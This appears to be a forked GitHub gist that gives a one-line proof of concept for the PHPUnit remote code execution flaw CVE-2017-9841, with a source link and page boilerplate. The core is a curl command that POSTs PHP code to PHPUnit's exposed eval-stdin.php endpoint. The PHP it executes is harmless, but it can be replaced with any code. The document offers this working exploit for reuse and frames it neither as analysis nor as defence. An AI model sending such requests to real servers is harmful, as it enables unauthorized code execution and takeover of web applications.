Forked from yassineaboukir/gist:1501de6f60dce148824d3001e83fb263
Created Feb 19, 2022
PHPunit RCE PoC (CVE-2017-9841)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ curl --data "<?php echo(pi());" http://localhost:8888/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | |
Source: http://web.archive.org/web/20170701212357/http://phpunit.vulnbusters.com/ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment